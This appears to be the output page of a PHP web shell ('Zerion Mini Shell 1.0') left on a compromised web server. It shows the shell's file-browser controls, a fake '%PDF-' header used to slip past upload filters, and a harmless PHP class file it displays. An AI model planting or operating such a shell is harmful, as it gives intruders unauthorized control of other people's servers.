%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /www/varak.net/video.varak.net/app/
Upload File :
Create Path :
Current File : /www/varak.net/video.varak.net/app/BaseRenderer.php

<?php
/**
 * Created by PhpStorm.
 * User: Turbo
 * Date: 14.12.2015
 * Time: 17:35
 */

namespace App;

class BaseRenderer
{
	public $subDir = NULL;
	public $basePath = NULL;
	public $path = NULL;

	public function __construct($path = NULL, $subDir = NULL)
	{
		$this->basePath = $path;
		$this->path = $path . $subDir;
		$this->subDir = $subDir;
	}
}

Zerion Mini Shell 1.0